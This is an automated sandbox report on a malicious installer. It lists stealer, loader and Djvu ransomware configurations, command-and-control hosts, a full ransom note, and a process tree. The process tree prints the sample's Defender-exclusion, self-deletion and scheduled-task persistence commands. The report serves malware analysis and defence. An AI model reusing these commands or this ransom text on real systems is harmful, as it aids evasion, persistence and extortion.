Resubmissions

12-09-2021 18:05

210912-wpjm6afecr 10

12-09-2021 07:11

210912-h1abzacbb7 10

Analysis

  • max time kernel
    1811s
  • max time network
    1812s
  • platform
    windows10_x64
  • resource
    win10-de
  • submitted
    12-09-2021 18:05

General

  • Target

    setup_x86_x64_install.exe

  • Size

    3.5MB

  • MD5

    1b5154bc65145adba0a58e964265d5f2

  • SHA1

    5a96fd55be61222b3e6438712979dc2a18a50b8c

  • SHA256

    c48cd55efee57f0b7ff4547a0a20ebfbdf4188d059512b10a29879bf30c4fc19

  • SHA512

    9465da97b0986fef660e3f7725b4d4c034bef677acbe36382d95a8052c54634f004162aa3f105156e503af1b26632e47e44234ef9825b388260a6bcd310a5026

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://shellloader.com/welcome

Extracted

Path

C:\_readme.txt

Family

djvu

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-CtDpAM1g5f Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: managerhelper@airmail.cc Your personal ID: 0333gSd743dfRiXRqq62TeogIfmpihYZJ6wDmuUVD07WwczX6Bm
Emails

manager@mailtemp.ch

managerhelper@airmail.cc

URLs

https://we.tl/t-CtDpAM1g5f

Extracted

Family

vidar

Version

40.5

Botnet

706

C2

https://gheorghip.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

pab123

C2

45.14.49.169:22411

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Signatures

  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies system executable filetype association 2 TTPs 3 IoCs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • Registers COM server for autorun 1 TTPs
  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

  • suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent

    suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity

    suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity

  • suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2

    suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2

  • suricata: ET MALWARE Win32/Tnega Activity (GET)

    suricata: ET MALWARE Win32/Tnega Activity (GET)

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 49 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Modifies extensions of user files 11 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets DLL path for service in the registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 53 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 9 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 19 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 39 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 56 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 15 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Runs net.exe
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 20 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 17 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1252
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1420
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
        1⤵
          PID:1868
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2440
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2408
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1272
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                1⤵
                  PID:2732
                  • C:\Windows\system32\wbem\WMIADAP.EXE
                    wmiadap.exe /F /T /R
                    2⤵
                      PID:5148
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1100
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:896
                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:7952
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          3⤵
                            PID:204
                            • C:\Windows\SysWOW64\schtasks.exe
                              /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                              4⤵
                              • Creates scheduled task(s)
                              PID:7196
                        • C:\Users\Admin\AppData\Roaming\dvebwec
                          C:\Users\Admin\AppData\Roaming\dvebwec
                          2⤵
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:4380
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:7676
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            3⤵
                              PID:7396
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            2⤵
                            • Suspicious use of SetThreadContext
                            PID:4048
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              3⤵
                                PID:8140
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              2⤵
                              • Suspicious use of SetThreadContext
                              PID:7360
                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                3⤵
                                  PID:7732
                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                2⤵
                                • Suspicious use of SetThreadContext
                                PID:7448
                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  3⤵
                                    PID:5976
                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  2⤵
                                  • Suspicious use of SetThreadContext
                                  PID:1456
                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    3⤵
                                      PID:6064
                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    2⤵
                                    • Suspicious use of SetThreadContext
                                    PID:5476
                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      3⤵
                                        PID:1364
                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      2⤵
                                      • Suspicious use of SetThreadContext
                                      PID:5852
                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        3⤵
                                          PID:6340
                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        2⤵
                                        • Suspicious use of SetThreadContext
                                        PID:6296
                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                          3⤵
                                            PID:7952
                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                          2⤵
                                          • Suspicious use of SetThreadContext
                                          PID:4444
                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                            3⤵
                                              PID:6620
                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                            2⤵
                                            • Suspicious use of SetThreadContext
                                            PID:5400
                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                              3⤵
                                                PID:6936
                                            • C:\Users\Admin\AppData\Roaming\dvebwec
                                              C:\Users\Admin\AppData\Roaming\dvebwec
                                              2⤵
                                              • Checks SCSI registry key(s)
                                              • Suspicious behavior: MapViewOfSection
                                              PID:6152
                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                              2⤵
                                              • Suspicious use of SetThreadContext
                                              PID:4192
                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                3⤵
                                                  PID:6172
                                              • C:\Users\Admin\AppData\Local\3eedc4fe-4a39-4961-b84a-cecbcb4d1e46\AEDF.exe
                                                C:\Users\Admin\AppData\Local\3eedc4fe-4a39-4961-b84a-cecbcb4d1e46\AEDF.exe --Task
                                                2⤵
                                                • Suspicious use of SetThreadContext
                                                PID:4836
                                                • C:\Users\Admin\AppData\Local\3eedc4fe-4a39-4961-b84a-cecbcb4d1e46\AEDF.exe
                                                  C:\Users\Admin\AppData\Local\3eedc4fe-4a39-4961-b84a-cecbcb4d1e46\AEDF.exe --Task
                                                  3⤵
                                                    PID:1348
                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                  2⤵
                                                  • Suspicious use of SetThreadContext
                                                  PID:7452
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    3⤵
                                                      PID:6300
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    2⤵
                                                    • Suspicious use of SetThreadContext
                                                    PID:2980
                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                      3⤵
                                                        PID:7244
                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                      2⤵
                                                      • Suspicious use of SetThreadContext
                                                      PID:6524
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        3⤵
                                                          PID:5684
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        2⤵
                                                        • Suspicious use of SetThreadContext
                                                        PID:5156
                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                          3⤵
                                                            PID:7256
                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                          2⤵
                                                          • Suspicious use of SetThreadContext
                                                          PID:6944
                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                            3⤵
                                                              PID:4688
                                                          • C:\Users\Admin\AppData\Local\3eedc4fe-4a39-4961-b84a-cecbcb4d1e46\AEDF.exe
                                                            C:\Users\Admin\AppData\Local\3eedc4fe-4a39-4961-b84a-cecbcb4d1e46\AEDF.exe --Task
                                                            2⤵
                                                            • Suspicious use of SetThreadContext
                                                            PID:4268
                                                            • C:\Users\Admin\AppData\Local\3eedc4fe-4a39-4961-b84a-cecbcb4d1e46\AEDF.exe
                                                              C:\Users\Admin\AppData\Local\3eedc4fe-4a39-4961-b84a-cecbcb4d1e46\AEDF.exe --Task
                                                              3⤵
                                                                PID:7380
                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              2⤵
                                                              • Suspicious use of SetThreadContext
                                                              PID:6552
                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                3⤵
                                                                  PID:4320
                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                2⤵
                                                                • Suspicious use of SetThreadContext
                                                                PID:2148
                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  3⤵
                                                                    PID:2176
                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  2⤵
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:6324
                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                    3⤵
                                                                      PID:5612
                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                    2⤵
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:3024
                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                      3⤵
                                                                        PID:3920
                                                                    • C:\Users\Admin\AppData\Roaming\dvebwec
                                                                      C:\Users\Admin\AppData\Roaming\dvebwec
                                                                      2⤵
                                                                      • Checks SCSI registry key(s)
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      PID:7856
                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                      2⤵
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:5616
                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                        3⤵
                                                                          PID:8056
                                                                      • C:\Users\Admin\AppData\Local\3eedc4fe-4a39-4961-b84a-cecbcb4d1e46\AEDF.exe
                                                                        C:\Users\Admin\AppData\Local\3eedc4fe-4a39-4961-b84a-cecbcb4d1e46\AEDF.exe --Task
                                                                        2⤵
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:2508
                                                                        • C:\Users\Admin\AppData\Local\3eedc4fe-4a39-4961-b84a-cecbcb4d1e46\AEDF.exe
                                                                          C:\Users\Admin\AppData\Local\3eedc4fe-4a39-4961-b84a-cecbcb4d1e46\AEDF.exe --Task
                                                                          3⤵
                                                                            PID:6668
                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                          2⤵
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:1264
                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                            3⤵
                                                                              PID:4804
                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                            2⤵
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:4916
                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              3⤵
                                                                                PID:4568
                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              2⤵
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:6568
                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                3⤵
                                                                                  PID:6164
                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                2⤵
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:6640
                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  3⤵
                                                                                    PID:7476
                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  2⤵
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:5084
                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    3⤵
                                                                                      PID:3712
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Drops file in Windows directory
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  • Suspicious use of SendNotifyMessage
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:3044
                                                                                  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                                                                                    2⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:2900
                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:3016
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8CBC81D3\setup_install.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\7zS8CBC81D3\setup_install.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1924
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                                                                          5⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2900
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                                                                            6⤵
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4432
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c Sun05ac1b0207d3ff3b8.exe
                                                                                          5⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:352
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8CBC81D3\Sun05ac1b0207d3ff3b8.exe
                                                                                            Sun05ac1b0207d3ff3b8.exe
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Checks processor information in registry
                                                                                            PID:4388
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im Sun05ac1b0207d3ff3b8.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS8CBC81D3\Sun05ac1b0207d3ff3b8.exe" & del C:\ProgramData\*.dll & exit
                                                                                              7⤵
                                                                                                PID:2232
                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                  taskkill /im Sun05ac1b0207d3ff3b8.exe /f
                                                                                                  8⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:5988
                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                  timeout /t 6
                                                                                                  8⤵
                                                                                                  • Delays execution with timeout.exe
                                                                                                  PID:5000
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c Sun052bbd8bebd9.exe
                                                                                            5⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:3248
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS8CBC81D3\Sun052bbd8bebd9.exe
                                                                                              Sun052bbd8bebd9.exe
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4304
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c Sun05532f7abc.exe
                                                                                            5⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:3852
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS8CBC81D3\Sun05532f7abc.exe
                                                                                              Sun05532f7abc.exe
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks SCSI registry key(s)
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:4444
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c Sun05640630a6aa.exe
                                                                                            5⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:3192
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS8CBC81D3\Sun05640630a6aa.exe
                                                                                              Sun05640630a6aa.exe
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4268
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c Sun059375dac544fc4a.exe
                                                                                            5⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4128
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS8CBC81D3\Sun059375dac544fc4a.exe
                                                                                              Sun059375dac544fc4a.exe
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:4368
                                                                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4888
                                                                                                • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4224
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                    9⤵
                                                                                                      PID:3852
                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                        10⤵
